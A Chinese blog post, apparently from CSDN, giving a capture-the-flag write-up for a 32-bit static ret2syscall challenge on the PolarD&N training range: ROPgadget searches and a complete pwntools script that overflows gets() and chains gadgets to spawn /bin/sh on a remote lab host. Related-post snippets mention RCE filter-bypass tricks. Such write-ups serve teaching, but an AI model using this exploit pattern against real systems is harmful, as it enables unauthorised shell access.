[PolarD&N]题解——03ret2syscall_32

最新推荐文章于 2024-01-03 23:03:41 发布
最新推荐文章于 2024-01-03 23:03:41 发布
阅读量140 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80238613/article/details/133803253
版权

题目来源:PolarD&N靶场(https://www.polarctf.com/#/

题目名称:03ret2syscall_32

是一个32位静态的题目!

思路:

door()函数存在溢出:

决定利用gets()函数的溢出,去构造execve("/bin/sh", 0, 0)。

使用命令查找eax,ebx,ecx,edx:

ROPgadget --binary 03ret2syscall_32 --only 'pop|ret' | grep 'eax'

ROPgadget --binary 03ret2syscall_32 --only 'pop|ret' | grep 'ebx'

存在ebx,ecx,edx连续的寄存器,选取连续的即可。

查找/bin/sh字符串:

ROPgadget --binary 03ret2syscall_32 --string '/bin/sh'

查找int 0x80:

ROPgadget --binary 03ret2syscall_32 --only 'int'

最终脚本:

from pwn import *

sh = remote('123.60.135.228',2062)

padding = 0x208+4
pop_eax_ret = 0x080b8576
pop_edx_ecx_ebx_ret = 0x0806f250
int_0x80 = 0x0806cea3
binsh = 0x080ea068

payload = flat(['a' * padding, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0,binsh,int_0x80])


sh.sendline(payload)
sh.interactive()

如有错误欢迎大佬指正!

高冷女神不太高冷
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PolarD&N(swp)
果粒程
04-15 589
根据提示去找swp文件,首先了解什么是swp文件swp即swap(交换分区)的简写,在编辑文件时产生,它是隐藏文件。这个文件是一个临时交换文件,用来备份缓冲区中的内容。类似于Windows的虚拟内存,就是当内存不足的时候,把一部分硬盘空间虚拟成内存使用,从而解决内存容量不足的情况。如果文件正常退出,则此文件自动删除。如果并没有对文件进行修改,而只是读取文件,是不会产生swp文件的.swp的产生1.当你用多个程序编辑同一个文件时。
PolarD&N靶场题解
qq_43423311的博客
03-23 2406
PolarD&N CTF靶场。
Linux Systemcall Int0x80方式、Sysenter/Sysexit Difference Comparation
sdulibh的专栏
03-14 6386
时间 2014-11-20 22:30:00  博客园_.Little Hann 原文  http://www.cnblogs.com/LittleHann/p/4111692.html 主题 Linux 寄存器 目录 1. 系统调用简介 2. Linux系统调用实现方式的演进 3. 通过INT 0x80中断方式进入系统调用 4. 通过sysenter指令方式直接进入系
PolarD&N CTF—小心有F射
m0_64447841的博客
10-12 121
仿射解密函数:F(x) = a-1(x - b) (mod m),其中a-1是a在Zm群的乘法逆元,m是字母的数量。3、即将纯文本字母的整数值乘以a,然后将b加到结果中,最后我们取模数m(也就是说,当解除以m时取余数,或者取掉字母的长度,直到得到小于该长度的数字)。拿到这个文本的第一时间是没有思路的,因为确实是我没见过的密码,但是仔细观察第一行字符串很像公式,就搜索了一下,然后就搜索到了这个密码。2)找到的明文字母的整数值后,对这些值执行计算,在此例中,所需的计算为(5x + 8);
PolarD&N-CTF-web方向-简单
J1ng_Hong的博客
12-06 2066
所以bp的方法就不行了。然后源码看了好久都没找到id=9的地方,并且我还尝试传入id这个参数。post传参一个yyds=666,这是不会被检测的。这就是说我们需要post一个名为xdmtql的变量,然后这个变量不能是数组。然后发现有一个index.php,然后发现根目录有一个flag的文件。然后发现了一个叫做/.index.php.swp的备份文件。这就说明,如果换行符应该是不会被检测的。虽然很多乱码,但是flag还是包含在里面的。要匹配 . ,请使用 \.。然后就得到了flag。然后就得到了flag。
PHP是世界上最好的语言-PolarD&N XXF无参数RCE QUERY_STRING 特性
m0_64180167的博客
12-17 456
这个靶场我之前看到过打广告,而且感觉比较新 来坐坐这里还是。
polar CTF 简单rce
最新发布
samRsa
01-03 564
polar CTF 简单rce 【代码】polar CTF 简单rce。
PHP-RCE绕过的姿势总结
有时候,想要一块二向箔
02-18 7606
一、命令执行空格过滤取反绕过命令分隔符黑名单绕过(比如flag字符)拼接二、代码执行总结参考文章 前言 做了很多的题目,静下心来学习大佬做点小总结 一、命令执行 空格过滤 < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 取反绕过 取反两次就可以得到想要绕过限制的数据 传参时 ?code=(~%8F%97%8F%96%91%99%90)(); 在做NSS平台上的一道rce题目就是用到类似的思路,
PolarD&N(简单rce)
果粒程
04-16 440
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-i7IKevHK-1681605902192)(D:\网安笔记\图片\image-20230415190913908.png)]
PolarD&N_PWN_Choice
Kuluha的博客
10-14 164
当v4等于1时,选择Data1,当v4等于2时,选择Data2,如果v4不等用于1或2,则执行Data3.那么我们只要通过向scanf发送不等于1或2的数,就可以执行Data3。PS:怎么选择Data3呢,感觉在好多人眼里这是一个再简单不过的问题,但是在以前这个问题难倒了我好一阵,所以,我选择在这里开一个小讲堂帮助一下那些跟我一样不知道也不敢问的家人们,大家可以各取所需。在主函数中我们发现三个选项,分别为Data1/2/3,我们分别点开函数发现,三者中唯有Data3存在足够的溢出可以使我们进一步操作。
Polar_D&N[MISC]大礼包
m0_73720466的博客
10-15 74
因为flag格式是flag{},想到栅栏密码对其进行解密(https://www.qqxiuzi.cn/bianma/zhalanmima.php)1) 根据加密压缩包的注释得出密码是6位以上,用ARCHPR工具限定纯数字,7-8位爆破得到密码“9635421”在图片尾部得到一串base32,解码得到base64,再解码后得到明文sn{bvr1_0yytcyp_fp0}得到synt{cbyvpr_1f_p00y},再解一次凯撒密码(移位数是13)得到flag。
PolarD&N-CTF-web方向-中等
J1ng_Hong的博客
12-12 1323
(由于发现中等题里面有许多新的知识点,所以特意拉了一个新的博客来展示)
polar靶场通关笔记
weixin_43296565的博客
06-06 4512
这里是关于自己打polar靶场的小笔记
c语言int 0x80,「JarvisOJ」系统调用——int $0x80/syscall[回顾JOJ level4——无.so]
weixin_39786141的博客
05-23 576
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?宏观上说,int $0x80是intel汇编层面的系统调用,而syscall也是系统调用,只不过是linux系统中c语言环境下的系统调用实体。只是层面不同,指的是一个东西。Linux 系统调用(SCI,system call interface)的实现机制实际上是一个多路汇聚以及分解的过程,该汇聚点就是 0x80 中断这...
汇编笔记:syscall和int 80H
无香花自开
10-10 3294
;nasm -f elf64 -g -F stabs testhello.s ;ld -o hello testhello.o section .data msg: db "hello world!", 10 ; ascii表中10对应换行符 msglen: equ $-msg section .bss section .text global _start _start: Nop ;i386通过中断(int 0x80)来实现系统调用 ;寄存器 eax 中存放系统调用号,同时返回值也存.
系统调用(int 0x80)详解
热门推荐
fivedoumi的专栏
11-16 2万+
1、系统调用初始化 在系统启动时,会在sched_init(void)函数中调用set_system_gate(0x80,&system_call),设置中断向量号0x80的中断描述符: #define set_system_gate(n,addr)  _set_gate(&idt[n],15,3,addr) 其中15表示此中断号对应的是陷阱门,注意,这个中断向量不是中断门描述符
Linux系统调用:使用int 0x80
Just For Fun
04-19 7902
系统调用 系统调用的概念 系统调用是计算机程序请求操作系统内核服务的方式,包括硬件相关的服务(例如访问硬盘驱动器)、创建和执行新的进程和进程调度等等。系统调用提供了进程和操作系统间的必要接口。 在大多数操作系统中,系统调用只能被用户空间进程使用。而在某些操作系统中,比如在OS/360及其后续的一些操作系统中,有特权的系统代码也会触发系统调用。 系统调用的分类 系统调用大体上可分为...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8234
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值